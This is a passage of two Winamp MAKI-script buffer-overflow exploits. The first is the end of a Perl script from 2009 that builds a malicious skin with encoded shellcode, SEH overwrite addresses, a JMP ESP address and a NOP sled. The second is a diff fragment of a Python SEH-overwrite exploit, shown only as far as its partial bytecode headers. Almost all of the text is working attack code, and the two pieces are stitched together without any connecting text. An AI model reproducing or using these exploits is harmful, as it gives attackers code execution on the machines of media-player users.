"\x98\x6C\xFA\x40\x8B\x85\x0C\x1B\x6E\xE8\x94\x05\x71\x9B\xD5\x36\xFD\x03\xF8\x4A\x97\x95\x05\x02\xB7\xDB\x26\x7A\x10\xF2\xD5\x7F".
"\xC4\xAC\xDF\x48\xA6\xA0\x54\x51\x57\x6C\xDC\x76\x35\xA5\xBA\xB5\xB3\x05\xCB\x4D\xAD\xC1\xE6\x18\xD2\x8F\x68\x96\xC1\xFE\x29\x61".
"\xB7\xDA\x51\x4D\x91\x65\x01\xCA\x0C\x1B\x70\xDB\xF7\x14\x95\xD5\x36\xED\xE8\x45\x98\x0F\x3F\x4E\xA0\x52\x2C\xD9\x82\x4B\x3B\x9B".
"\x7A\x66\x0E\x42\x8F\xFC\x79\x41\x15\x80\x9C\x02\x99\x31\xED\xC7\x19\x53\x98\x47\x98\x63\x60\xB1\x5A\x29\x8C\xAA\x4D\xC1\xBB\xE2".
"\xF6\x84\x73\x41\xBD\xB3\xB2\xEB\x2F\x66\x55\x50\x94\x05\xC0\x73\x1F\x96\x1B\x40\x9B\x1B\x67\x24\x27\xAC\x41\x65\x12\x00\x00\x00".
"\x01\x01\x00\x00\x11\x00\x67\x65\x74\x52\x75\x6E\x74\x69\x6D\x65\x56\x65\x72\x73\x69\x6F\x6E";
my $maki_script2 = "\x01\x01\x00\x00\x0B\x00\x67\x65\x74\x53\x6B\x69\x6E\x4E\x61\x6D\x65\x01\x01\x00\x00\x0D\x00\x67\x65\x74\x50\x72\x69\x76\x61\x74".
"\x65\x49\x6E\x74\x01\x01\x00\x00\x0C\x00\x67\x65\x74\x54\x69\x6D\x65\x4F\x66\x44\x61\x79\x01\x01\x00\x00\x0D\x00\x73\x65\x74\x50".
"\x72\x69\x76\x61\x74\x65\x49\x6E\x74\x01\x01\x00\x00\x0A\x00\x6D\x65\x73\x73\x61\x67\x65\x42\x6F\x78\x01\x01\x00\x00\x0F\x00\x69".
"\x6E\x74\x65\x67\x65\x72\x54\x6F\x53\x74\x72\x69\x6E\x67\x01\x01\x00\x00\x0E\x00\x6F\x6E\x53\x63\x72\x69\x70\x74\x4C\x6F\x61\x64".
"\x65\x64\x01\x01\x00\x00\x0E\x00\x67\x65\x74\x53\x63\x72\x69\x70\x74\x47\x72\x6F\x75\x70\x0A\x01\x00\x00\x09\x00\x67\x65\x74\x4F".
"\x62\x6A\x65\x63\x74\x01\x01\x00\x00\x0D\x00\x6F\x6E\x53\x65\x74\x58\x75\x69\x50\x61\x72\x61\x6D\x01\x01\x00\x00\x08\x00\x73\x74".
"\x72\x6C\x6F\x77\x65\x72\x01\x01\x00\x00\x0F\x00\x73\x74\x72\x69\x6E\x67\x54\x6F\x49\x6E\x74\x65\x67\x65\x72\x14\x01\x00\x00\x07".
"\x00\x73\x65\x74\x54\x65\x78\x74\x16\x01\x00\x00\x0B\x00\x73\x65\x74\x58\x6D\x6C\x70\x61\x72\x61\x6D\x14\x01\x00\x00\x0D\x00\x6F".
"\x6E\x54\x65\x78\x74\x43\x68\x61\x6E\x67\x65\x64\x14\x01\x00\x00\x0C\x00\x67\x65\x74\x41\x75\x74\x6F\x57\x69\x64\x74\x68\x14\x01".
"\x00\x00\x0B\x00\x73\x65\x74\x58\x6D\x6C\x50\x61\x72\x61\x6D\x23\x00\x00\x00\x01\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01".
"\x01\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x04\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\xFF\xFF\x00".
"\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x88\x13\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x14\x01\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x14\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x16\x01\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x01\x00\x0A\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x01\x00\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0D\x00\x00".
"\x00\x07\x00\x00\x00\x0C\x00\x72\x75\x6E\x74\x69\x6D\x65\x63\x68\x65\x63\x6B\x0C\x00\x00\x00\x15\x00\x54\x68\x69\x73\x20\x73\x63".
"\x72\x69\x70\x74\x20\x72\x65\x71\x75\x69\x72\x65\x73\x20\x0D\x00\x00\x00\x1F\x00\x57\x69\x6E\x61\x6D\x70\x20\x35\x2E\x35\x34\x20".
"\x28\x73\x6B\x69\x6E\x20\x76\x65\x72\x73\x69\x6F\x6E\x20\x31\x2E\x33\x34\x29\x0E\x00\x00\x00\x05\x00\x45\x72\x72\x6F\x72\x0F\x00".
"\x00\x00\x00\x00\x11\x00\x00\x00\x05\x00\x44\x45\x42\x55\x47\x18\x00\x00\x00\x04\x00\x74\x65\x78\x74\x19\x00\x00\x00\x05\x00\x6C".
"\x61\x62\x65\x6C\x1A\x00\x00\x00\x04\x00\x6C\x69\x6E\x6B\x1D\x00\x00\x00\x05\x00\x73\x68\x69\x66\x74\x1E\x00\x00\x00\x07\x00\x74".
"\x6F\x6F\x6C\x74\x69\x70\x21\x00\x00\x00\x01\x00\x78\x22\x00\x00\x00\x01\x00\x77\x03\x00\x00\x00\x00\x00\x00\x00\x07\x00\x00\x00".
"\x5F\x01\x00\x00\x00\x00\x00\x00\x0A\x00\x00\x00\xCC\x01\x00\x00\x14\x00\x00\x00\x0F\x00\x00\x00\x7B\x02\x00\x00\x1B\x03\x00\x00".
"\x01\x03\x00\x00\x00\x01\x00\x00\x00\x00\x18\x00\x00\x00\x00\x30\x02\x01\x03\x00\x00\x00\x01\x04\x00\x00\x00\x0C\x01\x03\x00\x00".
"\x00\x01\x05\x00\x00\x00\x0A\x51\x10\xB9\x00\x00\x00\x01\x02\x00\x00\x00\x01\x06\x00\x00\x00\x30\x02\x01\x09\x00\x00\x00\x01\x00".
"\x00\x00\x00\x01\x08\x00\x00\x00\x01\x07\x00\x00\x00\x01\x00\x00\x00\x00\x18\x01\x00\x00\x00\x18\x02\x00\x00\x00\x30\x02\x01\x0A".
"\x00\x00\x00\x01\x00\x00\x00\x00\x18\x03\x00\x00\x00\x30\x02\x01\x0A\x00\x00\x00\x01\x09\x00\x00\x00\x41\x01\x0B\x00\x00\x00\x0C".
"\x01\x09\x00\x00\x00\x01\x0A\x00\x00\x00\x0C\x50\x10\x06\x00\x00\x00\x01\x08\x00\x00\x00\x21\x01\x00\x00\x00\x00\x01\x00\x00\x00".
"\x00\x18\x03\x00\x00\x00\x01\x07\x00\x00\x00\x01\x00\x00\x00\x00\x18\x01\x00\x00\x00\x18\x04\x00\x00\x00\x02\x01\x00\x00\x00\x00".
"\x01\x0F\x00\x00\x00\x01\x06\x00\x00\x00\x01\x0E\x00\x00\x00\x01\x0C\x00\x00\x00\x01\x0D\x00\x00\x00\x40\x18\x05\x00\x00\x00\x02".
"\x01\x08\x00\x00\x00\x21\x01\x06\x00\x00\x00\x21\x01\x01\x00\x00\x00\x21\x03\x10\x00\x00\x00\x01\x00\x00\x00\x00\x01\x0F\x00\x00".
"\x00\x01\x08\x00\x00\x00\x01\x11\x00\x00\x00\x01\x10\x00\x00\x00\x70\x05\x00\x00\x00\x04\x02\x01\x01\x00\x00\x00\x21\x03\x12\x00".
"\x00\x00\x01\x00\x00\x00\x00\x01\x0F\x00\x00\x00\x01\x08\x00\x00\x00\x01\x11\x00\x00\x00\x01\x00\x00\x00\x00\x01\x12\x00\x00\x00".
"\x70\x06\x00\x00\x00\x01\x70\x05\x00\x00\x00\x04\x02\x01\x01\x00\x00\x00\x21\x01\x17\x00\x00\x00\x01\x08\x00\x00\x00\x30\x02\x19".
"\x9C\xFE\xFF\xFF\x11\x06\x00\x00\x00\x01\x01\x00\x00\x00\x21\x01\x16\x00\x00\x00\x01\x00\x00\x00\x00\x70\x08\x00\x00\x00\x00\x30".
"\x02\x01\x13\x00\x00\x00\x01\x16\x00\x00\x00\x01\x18\x00\x00\x00\x70\x09\x00\x00\x00\x01\x30\x02\x01\x14\x00\x00\x00\x01\x16\x00".
"\x00\x00\x01\x19\x00\x00\x00\x70\x09\x00\x00\x00\x01\x30\x02\x01\x15\x00\x00\x00\x01\x16\x00\x00\x00\x01\x1A\x00\x00\x00\x70\x09".
"\x00\x00\x00\x01\x30\x02\x01\x01\x00\x00\x00\x21\x03\x1B\x00\x00\x00\x03\x1C\x00\x00\x00\x01\x02\x00\x00\x00\x10\x06\x00\x00\x00".
"\x01\x01\x00\x00\x00\x21\x01\x00\x00\x00\x00\x01\x1B\x00\x00\x00\x70\x0B\x00\x00\x00\x01\x01\x1D\x00\x00\x00\x08\x10\x17\x00\x00".
"\x00\x01\x17\x00\x00\x00\x01\x00\x00\x00\x00\x01\x1C\x00\x00\x00\x70\x0C\x00\x00\x00\x01\x30\x02\x01\x00\x00\x00\x00\x01\x1B\x00".
"\x00\x00\x70\x0B\x00\x00\x00\x01\x01\x19\x00\x00\x00\x08\x10\x11\x00\x00\x00\x01\x14\x00\x00\x00\x01\x1C\x00\x00\x00\x70\x0D\x00".
"\x00\x00\x01\x02\x01\x00\x00\x00\x00\x01\x1B\x00\x00\x00\x70\x0B\x00\x00\x00\x01\x01\x1A\x00\x00\x00\x08\x10\x16\x00\x00\x00\x01".
"\x15\x00\x00\x00\x01\x1C\x00\x00\x00\x01\x1E\x00\x00\x00\x70\x0E\x00\x00\x00\x02\x02\x01\x01\x00\x00\x00\x21\x03\x1F\x00\x00\x00".
"\x01\x02\x00\x00\x00\x10\x06\x00\x00\x00\x01\x01\x00\x00\x00\x21\x01\x20\x00\x00\x00\x01\x14\x00\x00\x00\x70\x10\x00\x00\x00\x00".
"\x01\x17\x00\x00\x00\x40\x30\x02\x01\x13\x00\x00\x00\x01\x00\x00\x00\x00\x01\x20\x00\x00\x00\x70\x06\x00\x00\x00\x01\x01\x21\x00".
"\x00\x00\x70\x11\x00\x00\x00\x02\x02\x01\x13\x00\x00\x00\x01\x00\x00\x00\x00\x01\x20\x00\x00\x00\x4C\x70\x06\x00\x00\x00\x01\x01".
"\x22\x00\x00\x00\x70\x11\x00\x00\x00\x02\x02\x01\x01\x00\x00\x00\x21\x02\x01\x01\x00\x00\x00\x21\x02\x01\x01\x00\x00\x00\x21\x02".
"\x01\x01\x00\x00\x00\x21\x02\x01\x01\x00\x00\x00\x21\x02\x01\x01\x00\x00\x00\x21\x02\x01\x01\x00\x00\x00\x21";
# win32_exec - EXITFUNC=process CMD=calc.exe Size=338 Encoder=Alpha2 http://metasploit.com
my $shellcode =
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x48\x49\x49\x49".
"\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x51\x5a\x6a\x41".
"\x58\x30\x41\x31\x50\x41\x42\x6b\x41\x41\x51\x41\x32\x41\x41\x32".
"\x42\x41\x30\x42\x41\x58\x38\x41\x42\x50\x75\x69\x79\x4b\x4c\x4d".
"\x38\x70\x44\x55\x50\x45\x50\x75\x50\x6e\x6b\x77\x35\x67\x4c\x6c".
"\x4b\x43\x4c\x45\x55\x74\x38\x55\x51\x58\x6f\x4e\x6b\x52\x6f\x45".
"\x48\x4e\x6b\x43\x6f\x65\x70\x76\x61\x58\x6b\x50\x49\x4e\x6b\x36".
"\x54\x4e\x6b\x75\x51\x4a\x4e\x56\x51\x6b\x70\x4c\x59\x6c\x6c\x6e".
"\x64\x59\x50\x70\x74\x63\x37\x69\x51\x78\x4a\x56\x6d\x45\x51\x5a".
"\x62\x78\x6b\x6c\x34\x67\x4b\x51\x44\x36\x44\x74\x44\x30\x75\x4d".
"\x35\x6c\x4b\x31\x4f\x31\x34\x65\x51\x5a\x4b\x52\x46\x4c\x4b\x74".
"\x4c\x62\x6b\x6c\x4b\x61\x4f\x77\x6c\x35\x51\x7a\x4b\x6c\x4b\x57".
"\x6c\x4c\x4b\x37\x71\x5a\x4b\x4c\x49\x73\x6c\x77\x54\x47\x74\x38".
"\x43\x50\x31\x6b\x70\x32\x44\x4e\x6b\x61\x50\x66\x50\x4f\x75\x6b".
"\x70\x51\x68\x44\x4c\x6c\x4b\x77\x30\x36\x6c\x6e\x6b\x70\x70\x77".
"\x6c\x6c\x6d\x6c\x4b\x50\x68\x73\x38\x6a\x4b\x74\x49\x6c\x4b\x4b".
"\x30\x4c\x70\x63\x30\x73\x30\x45\x50\x4e\x6b\x45\x38\x35\x6c\x53".
"\x6f\x35\x61\x4c\x36\x75\x30\x71\x46\x6d\x59\x4a\x58\x4b\x33\x4f".
"\x30\x31\x6b\x70\x50\x43\x58\x61\x6e\x6e\x38\x4b\x52\x32\x53\x31".
"\x78\x4c\x58\x4b\x4e\x4c\x4a\x46\x6e\x50\x57\x6b\x4f\x5a\x47\x50".
"\x63\x31\x71\x30\x6c\x35\x33\x44\x6e\x63\x55\x44\x38\x35\x35\x37".
"\x70\x41";
my $overflow1 = "\x41" x 314;
my $overflow2 = "\x41" x 128;
my $overflow3 = "\x90" x 8;
my $sehjmp = "\xeb\x12\x41\x41";
my $sehret = "\x11\x10\xf0\x14"; #0x14f01011 POP, POP, RET WinAmp's aacPlusDecoder.w5s [Universal Address]
my $eip = "\xf8\x99\x01\x12"; #0x120199F8 JMP ESP
my $nopsled = "\x90" x 12;
print "[x] WinAmp <= 5.541 Skin Universal Buffer Overflow Exploit\n";
print "[x] Discovered and Exploited by SkD (skdrat@ hotmail.com)\n";
print "[x] Creating skin dir\n";
rmdir("SkD's Skin");
mkdir("SkD's Skin");
print "[x] Creating skin.xml file\n";
open(my $skin_xml_file, ">SkD's Skin\\skin.xml");
print $skin_xml_file $skin_xml;
close $skin_xml_file;
print "[x] Creating malicious MAKI script\n";
open(my $maki_script_file, ">SkD's Skin\\s.maki");
binmode $maki_script_file;
print $maki_script_file $maki_script1.
$overflow1.$sehjmp.$sehret.$overflow3.$eip.$nopsled.$shellcode.$overflow2.
$maki_script2;
close $maki_script_file;
print "[x] Universal exploit created!\n";
# milw0rm.com [2009-03-05]


@ -1,229 +1,229 @@
#usage: python winamp_maki_script.py
#Note : I got problem while using this python file under windows,but it works great under ubuntu :p
print "**************************************************************************"
print " Winamp <= 5.55 (MAKI script) Universal Seh Overwrite Exploit\n"
print " Advisory : http://vrt-sourcefire.blogspot.com/2009/05/winamp-maki-parsing-vulnerability.html\n"
print " Exploit code: His0k4\n"
print " Tested on: Windows XP Pro SP3 (EN)\n"
print " Greetings to:"
print " All friends & muslims HaCkers(dz),snakespc.com\n"
print " Serra7 Merra7,Koulchi Mderra7\n"
print "**************************************************************************"
import os
header1=(
"\x46\x47\x03\x04\x17\x00\x00\x00\x27\x00\x00\x00\x71\x49\x65\x51\x87\x0d\x51\x4a"
"\x91\xe3\xa6\xb5\x32\x35\xf3\xe7\x64\x0f\xf5\xd6\xfa\x93\xb7\x49\x93\xf1\xba\x66"
"\xef\xae\x3e\x98\x7b\xc4\x0d\xe9\x0d\x84\xe7\x4a\xb0\x2c\x04\x0b\xd2\x75\xf7\xfc"
"\xb5\x3a\x02\xb2\x4d\x43\xa1\x4b\xbe\xae\x59\x63\x75\x03\xf3\xc6\x78\x57\xc6\x87"
"\x43\xe7\xfe\x49\x85\xf9\x09\xcc\x53\x2a\xfd\x56\x65\x36\x60\x38\x1b\x46\xa7\x42"
"\xaa\x75\xd8\x3f\x66\x67\xbf\x73\xf4\x7a\x78\xf4\xbb\xb2\xf7\x4e\x9c\xfb\xe7\x4b"
"\xa9\xbe\xa8\x8d\x02\x0c\x37\x3a\xbf\x3c\x9f\x43\x84\xf1\x86\x88\x5b\xcf\x1e\x36"
"\xb6\x5b\x0c\x5d\xe1\x7d\x1f\x4b\xa7\x0f\x8d\x16\x59\x94\x19\x41\x99\xe1\xe3\x4e"
"\x36\xc6\xec\x4b\x97\xcd\x78\xbc\x9c\x86\x28\xb0\xe5\x95\xbe\x45\x72\x20\x91\x41"
"\x93\x5c\xbb\x5f\xf9\xf1\x17\xfd\x4e\x6d\x90\x60\x7e\x53\x2e\x48\xb0\x04\xcc\x94"
"\x61\x88\x56\x72\xc0\xbc\x3a\x40\x22\x6f\xd6\x4b\x8b\xa4\x10\xc8\x29\x93\x25\x47"
"\x4d\x3e\xaa\x97\xd0\xf4\xa8\x4f\x81\x7b\x0a\xf2\x2a\x45\x49\x83\xfa\xbb\xe4\x64"
"\xf4\x81\xd9\x49\xb0\xc0\xa8\x5b\x2e\xc3\xbc\xfd\x3f\x5e\xb6\x62\x5e\x37\x8d\x40"
"\x8d\xea\x76\x81\x4a\xb9\x1b\x77\xbe\x97\x4f\xce\xb0\x77\x19\x4e\x99\x56\xd4\x98"
"\x33\xc9\x6c\x27\x0d\x20\xc2\xa8\xeb\x51\x2a\x4b\xba\x7f\x5d\x4b\xc6\x5d\x4c\x71"
"\x38\xba\x1e\x8d\x9e\x48\x3e\x48\xb9\x60\x8d\x1f\x43\xc5\xc4\x05\x40\xc9\x08\x0f"
"\x39\xaf\x23\x4b\x80\xf3\xb8\xc4\x8f\x7e\xbb\x59\x72\x86\xaa\xef\x0e\x31\xfa\x41"
"\xb7\xdc\x85\xa9\x52\x5b\xcb\x4b\x44\x32\xfd\x7d\x51\x37\x7c\x4e\xbf\x40\x82\xae"
"\x5f\x3a\xdc\x33\x15\xfa\xb9\x5a\x7d\x9a\x57\x45\xab\xc8\x65\x57\xa6\xc6\x7c\xa9"
"\xcd\xdd\x8e\x69\x1e\x8f\xec\x4f\x9b\x12\xf9\x44\xf9\x09\xff\x45\x27\xcd\x64\x6b"
"\x26\x5a\x4b\x4c\x8c\x59\xe6\xa7\x0c\xf6\x49\x3a\xe4\x05\xcb\x6d\xc4\x8a\xc2\x48"
"\xb1\x93\x49\xf0\x91\x0e\xf5\x4a\xff\xcf\xdc\xb4\xfe\x81\xcc\x4b\x96\x1b\x72\x0f"
"\xd5\xbe\x0f\xff\xe1\x8c\xe2\x01\x59\xb0\xd5\x11\x97\x9f\xe4\xde\x6f\x51\x76\x0a"
"\xbd\xf8\xf0\x80\xa5\x1b\xa6\x42\xa0\x93\x32\x36\xa0\x0c\x8d\x4a\x1b\x34\x2e\x9b"
"\x98\x6c\xfa\x40\x8b\x85\x0c\x1b\x6e\xe8\x94\x05\x71\x9b\xd5\x36\xfd\x03\xf8\x4a"
"\x97\x95\x05\x02\xb7\xdb\x26\x7a\x10\xf2\xd5\x7f\xc4\xac\xdf\x48\xa6\xa0\x54\x51"
"\x57\x6c\xdc\x76\x35\xa5\xba\xb5\xb3\x05\xcb\x4d\xad\xc1\xe6\x18\xd2\x8f\x68\x96"
"\xc1\xfe\x29\x61\xb7\xda\x51\x4d\x91\x65\x01\xca\x0c\x1b\x70\xdb\xf7\x14\x95\xd5"
"\x36\xed\xe8\x45\x98\x0f\x3f\x4e\xa0\x52\x2c\xd9\x82\x4b\x3b\x9b\x7a\x66\x0e\x42"
"\x8f\xfc\x79\x41\x15\x80\x9c\x02\x99\x31\xed\xc7\x19\x53\x98\x47\x98\x63\x60\xb1"
"\x5a\x29\x8c\xaa\x4d\xc1\xbb\xe2\xf6\x84\x73\x41\xbd\xb3\xb2\xeb\x2f\x66\x55\x50"
"\x94\x05\xc0\x73\x1f\x96\x1b\x40\x9b\x1b\x67\x24\x27\xac\x41\x65\x0e\x00\x00\x00"
"\x01\x01\x00\x00\xab\xb0")
header2=(
"\x01\x01\x00\x00\x0b\x00\x67\x65\x74\x53\x6b\x69\x6e\x4e\x61\x6d\x65\x01\x01\x00"
"\x00\x0d\x00\x67\x65\x74\x50\x72\x69\x76\x61\x74\x65\x49\x6e\x74\x01\x01\x00\x00"
"\x0c\x00\x67\x65\x74\x54\x69\x6d\x65\x4f\x66\x44\x61\x79\x01\x01\x00\x00\x0d\x00"
"\x73\x65\x74\x50\x72\x69\x76\x61\x74\x65\x49\x6e\x74\x01\x01\x00\x00\x0a\x00\x6d"
"\x65\x73\x73\x61\x67\x65\x42\x6f\x78\x01\x01\x00\x00\x0f\x00\x69\x6e\x74\x65\x67"
"\x65\x72\x54\x6f\x53\x74\x72\x69\x6e\x67\x01\x01\x00\x00\x0e\x00\x6f\x6e\x53\x63"
"\x72\x69\x70\x74\x4c\x6f\x61\x64\x65\x64\x01\x01\x00\x00\x0e\x00\x67\x65\x74\x53"
"\x63\x72\x69\x70\x74\x47\x72\x6f\x75\x70\x0a\x01\x00\x00\x09\x00\x67\x65\x74\x4f"
"\x62\x6a\x65\x63\x74\x17\x01\x00\x00\x0b\x00\x6f\x6e\x4c\x65\x66\x74\x43\x6c\x69"
"\x63\x6b\x01\x01\x00\x00\x12\x00\x6e\x61\x76\x69\x67\x61\x74\x65\x55\x72\x6c\x42"
"\x72\x6f\x77\x73\x65\x72\x01\x01\x00\x00\x19\x00\x67\x65\x74\x50\x6c\x61\x79\x49"
"\x74\x65\x6d\x4d\x65\x74\x61\x44\x61\x74\x61\x53\x74\x72\x69\x6e\x67\x01\x01\x00"
"\x00\x17\x00\x67\x65\x74\x50\x6c\x61\x79\x49\x74\x65\x6d\x44\x69\x73\x70\x6c\x61"
"\x79\x54\x69\x74\x6c\x65\x1f\x00\x00\x00\x01\x01\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x01\x01\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x02\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x04\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x02\x00\x00\x00\xff\xff\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x01\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x02\x00\x00\x00\x88\x13\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x17\x01\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x0e\x00\x00\x00\x07\x00\x00\x00\x0c\x00\x72\x75\x6e\x74\x69\x6d"
"\x65\x63\x68\x65\x63\x6b\x0c\x00\x00\x00\x15\x00\x54\x68\x69\x73\x20\x73\x63\x72"
"\x69\x70\x74\x20\x72\x65\x71\x75\x69\x72\x65\x73\x20\x0d\x00\x00\x00\x1f\x00\x57"
"\x69\x6e\x61\x6d\x70\x20\x35\x2e\x35\x34\x20\x28\x73\x6b\x69\x6e\x20\x76\x65\x72"
"\x73\x69\x6f\x6e\x20\x31\x2e\x33\x34\x29\x0e\x00\x00\x00\x05\x00\x45\x72\x72\x6f"
"\x72\x0f\x00\x00\x00\x00\x00\x11\x00\x00\x00\x05\x00\x44\x45\x42\x55\x47\x14\x00"
"\x00\x00\x0a\x00\x6e\x6f\x77\x70\x6c\x61\x79\x69\x6e\x67\x16\x00\x00\x00\x12\x00"
"\x77\x69\x6e\x73\x68\x61\x64\x65\x69\x63\x6f\x6e\x6d\x6f\x64\x65\x72\x6e\x18\x00"
"\x00\x00\x31\x00\x68\x74\x74\x70\x3a\x2f\x2f\x63\x6c\x69\x65\x6e\x74\x2e\x77\x69"
"\x6e\x61\x6d\x70\x2e\x63\x6f\x6d\x2f\x6e\x6f\x77\x70\x6c\x61\x79\x69\x6e\x67\x2f"
"\x61\x72\x74\x69\x73\x74\x2f\x3f\x69\x63\x69\x64\x3d\x19\x00\x00\x00\x0c\x00\x26"
"\x61\x72\x74\x69\x73\x74\x4e\x61\x6d\x65\x3d\x1a\x00\x00\x00\x06\x00\x61\x72\x74"
"\x69\x73\x74\x1c\x00\x00\x00\x0b\x00\x75\x76\x6f\x78\x2f\x61\x72\x74\x69\x73\x74"
"\x1d\x00\x00\x00\x0a\x00\x63\x62\x73\x2f\x61\x72\x74\x69\x73\x74\x1e\x00\x00\x00"
"\x0b\x00\x73\x74\x72\x65\x61\x6d\x74\x69\x74\x6c\x65\x02\x00\x00\x00\x00\x00\x00"
"\x00\x07\x00\x00\x00\x53\x01\x00\x00\x13\x00\x00\x00\x0a\x00\x00\x00\x86\x01\x00"
"\x00\xd1\x02\x00\x00\x01\x03\x00\x00\x00\x01\x00\x00\x00\x00\x18\x00\x00\x00\x00"
"\x30\x02\x01\x03\x00\x00\x00\x01\x04\x00\x00\x00\x0c\x01\x03\x00\x00\x00\x01\x05"
"\x00\x00\x00\x0a\x51\x10\xb9\x00\x00\x00\x01\x02\x00\x00\x00\x01\x06\x00\x00\x00"
"\x30\x02\x01\x09\x00\x00\x00\x01\x00\x00\x00\x00\x01\x08\x00\x00\x00\x01\x07\x00"
"\x00\x00\x01\x00\x00\x00\x00\x18\x01\x00\x00\x00\x18\x02\x00\x00\x00\x30\x02\x01"
"\x0a\x00\x00\x00\x01\x00\x00\x00\x00\x18\x03\x00\x00\x00\x30\x02\x01\x0a\x00\x00"
"\x00\x01\x09\x00\x00\x00\x41\x01\x0b\x00\x00\x00\x0c\x01\x09\x00\x00\x00\x01\x0a"
"\x00\x00\x00\x0c\x50\x10\x06\x00\x00\x00\x01\x08\x00\x00\x00\x21\x01\x00\x00\x00"
"\x00\x01\x00\x00\x00\x00\x18\x03\x00\x00\x00\x01\x07\x00\x00\x00\x01\x00\x00\x00"
"\x00\x18\x01\x00\x00\x00\x18\x04\x00\x00\x00\x02\x01\x00\x00\x00\x00\x01\x0f\x00"
"\x00\x00\x01\x06\x00\x00\x00\x01\x0e\x00\x00\x00\x01\x0c\x00\x00\x00\x01\x0d\x00"
